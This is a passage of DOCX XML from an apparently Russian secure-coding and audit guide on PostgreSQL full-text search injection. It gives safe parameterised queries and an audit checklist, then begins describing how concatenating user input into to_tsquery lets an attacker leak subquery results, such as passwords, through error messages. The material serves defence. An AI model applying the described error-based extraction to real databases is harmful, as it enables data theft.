        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # PG 8.3+: plainto_tsquery как default safe-альтернатива</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C9232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D913A72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677BD651" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ plainto_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D9D664" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04028290" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY ts_rank(search_vector, plainto_tsquery('english', :q)) DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5785AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB06D55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F18F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C9ED4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F761D94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>max_length=200</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — soft DoS-mitigation против огромных query string. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантирует, что operators не parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159ACA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сложный случай: SQLAlchemy ORM с tsquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18406BB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import func, select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7018A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D9C39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># ORM-эквивалент: websearch_to_tsquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F1857" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stmt = select(Article).where(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07258F16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Article.search_vector.op("@@")(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEEB6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        func.websearch_to_tsquery("english", q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CA836C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220A35F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).order_by(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292844E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    func.ts_rank(Article.search_vector, func.websearch_to_tsquery("english", q)).desc()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E775FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).limit(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5FCE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func.websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> корректно делает bind-параметризацию + использует безопасную функцию. ORM-уровень предпочтителен для нового кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3A773" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки правильной защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B9A7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Кодовый аудит на этой категории:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088220E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все `to_tsquery(...:user_var)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> должны быть либо (1) заменены на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>, либо (2) подтверждены как server-side built из validated tokens (см. 3.15.2 «легитимное»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334E496" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Любой `to_tsquery` от endpoint-а search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — кандидат на review. Если signature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery('lang', :q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — direct user-input, это уязвимость 3.15.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F31F77B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Никаких concat в первом аргументе `to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(... || :input)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это уже 3.15.4 (error-based extraction через injected SQL до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEFEADF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (декабрь 2007). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phraseto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (сентябрь 2016). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (октябрь 2018). Не CVE — feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41125EE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFA15A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — что мы защищаем; миграция отсюда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506DE6F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.4 tsquery как error-based канал</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устраняет syntax-error → нет error-based channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23417F19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.1 LIKE wildcards</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельная категория с собственной защитой (escape).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B5A9DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий принцип «bind + правильная функция», 3.15.3 — частный случай.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E425D93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекомендация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как default для search-эндпоинтов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430CA585" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736C657" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   PostgreSQL Docs: «Text Search Functions and Operators» — https://www.postgresql.org/docs/current/textsearch-controls.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63EE70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 11 Release Notes: «New text search function» — https://www.postgresql.org/docs/release/11.0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF4209" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (введение и semantics) — https://www.postgresql.org/docs/current/functions-textsearch.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B553D26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pganalyze blog: «Full Text Search in PostgreSQL: A guide» — https://pganalyze.com/blog/postgres-full-text-search-guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6017813E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   SQLAlchemy Docs: «Full Text Search» — https://docs.sqlalchemy.org/en/20/dialects/postgresql.html#full-text-search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C60856" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.15.4 tsquery как error-based канал</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A726E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при невалидном input возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: syntax error in tsquery: "&lt;leaked-input&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полным содержимым input в text ошибки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если приложение строит первый аргумент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concatenation с user-input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (антипаттерн), атакующий может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>подложить SQL-subquery, который вернёт extraction target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (password, internal data) — результат subquery станет частью malformed tsquery-input → попадёт в error message → leaked в HTTP response. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>классический error-based канал</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (тот же класс, что 3.2 error-based via CAST), но source error — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
